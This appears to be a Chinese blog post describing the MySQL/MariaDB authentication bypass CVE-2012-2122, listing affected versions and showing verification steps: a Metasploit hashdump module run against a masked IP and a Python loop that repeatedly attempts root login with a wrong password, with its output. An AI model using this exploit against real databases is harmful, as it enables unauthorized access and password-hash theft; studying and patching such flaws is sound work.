热门标签
热门文章
- 1nltk报错Error loading stopwords: <urlopen error [Errno 11004]_error loading stopwords:
- 2UE5项目打包安卓端-思路解析_ue5 安卓打包
- 32. 编写function call文档解析-SpringAI实战教程_spring ai function call
- 4SpringMVC拦截器的作用及使用方法_webmvcconfigurer addinterceptors拦截器的作用
- 5SpringBoot配置拦截器对静态资源部分接口不实行拦截_addinterceptor 根目录不拦截
- 6AI大模型赋能开发者|海云安创始人谢朝海受邀在ISC.AI 2024大会就“大模型在软件开发&安全领域的应用”主题发表演讲
- 7[ 数据结构进阶 - C++ ] 二叉搜索树_k模型和kv模型
- 8Camtasia2024国产永久免费版电脑录屏软件下载_camtasia2024crack下载
- 9云计算、大数据、人工智能、物联网、虚拟现实技术、区块链技术(新一代信息技术)学习这一篇够了!_畅想未来物联网与大数据_大数据、云计算、人工智能
- 10防火墙综合实验之NAT和智能选路_交换机+智能选路
当前位置: article > 正文
Mysql身份认证漏洞 CVE-2012-2122_vulnerability(cve-2012-2122)补丁
作者:代码探险家 | 2024-08-17 22:52:22
赞
踩
vulnerability(cve-2012-2122)补丁
Mysql身份认证漏洞 CVE-2012-2122
一、漏洞介绍
MariaDB和MySQL在用户验证的处理上存在漏洞。攻击者可利用该漏洞绕过某些安全限制,也可能导致攻击者无需知道正确口令就能登录到MySQL服务器。
当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。 也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。
受影响的产品:
All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 are vulnerable.
MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.
MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.
二、漏洞危害
攻击者只要知道用户名,不断尝试就能够直接登入SQL数据库。
三、漏洞验证
使用MSF验证:
root@kali:~# msfconsole
msf5 > use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf5 auxiliary(scanner/mysql/mysql_authbypass_hashdump) > set RHOSTS 119.23.***.***
msf5 auxiliary(scanner/mysql/mysql_authbypass_hashdump) > run
- 1
- 2
- 3
- 4
使用python脚本验证:
root@kali:~# cat mysql_poc.py
#!/usr/bin/python
import subprocess
while 1:
subprocess.Popen("mysql -h 119.23.***.*** -P 3306 -u root --password=blah", shell=True).wait()
- 1
- 2
- 3
- 4
- 5
- 6
root@kali:~# python mysql_poc.py ERROR 1045 (28000): Access denied for user 'root'@'113.87.***.***' (using password: YES) ERROR 1045 (28000): Access denied for user 'root'@'113.87.***.***' (using password: YES) ERROR 1045 (28000): Access denied for user 'root'@'113.87.***.***' (using password: YES) ERROR 1045 (28000): Access denied for user 'root'@'113.87.***.***' (using password: YES) ERROR 1045 (28000): Access denied for user 'root'@'113.87.***.***' (using password: YES) ERROR 1045 (28000): Access denied for user 'root'@'113.87.***.***' (using password: YES) ERROR 1045 (28000): Access denied for user 'root'@'113.87.***.***' (using password: YES) ERROR 1045 (28000): Access denied for user 'root'@'113.87.***.***' (using password: YES) ERROR 1045 (28000): Access denied for user 'root'@'113.87.***.***' (using password: YES) ERROR 1045 (28000): Access denied for user 'root'@'113.87.***.***' (using password: YES) ERROR 1045 (28000): Access denied for user 'root'@'113.87.***.***' (using password: YES) ERROR 1045 (28000): Access denied for user 'root'@'113.87.***.***' (using password: YES) ERROR 1045 (28000): Access denied for user 'root'@'113.87.***.***' (using password: YES) ERROR 1045 (28000): Access denied for user 'root'@'113.87.***.***' (using password: YES) ERROR 1045 (28000): Access denied for user 'root'@'113.87.***.***' (using password: YES) ERROR 1045 (28000): Access denied
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/代码探险家/article/detail/994727
推荐阅读
相关标签
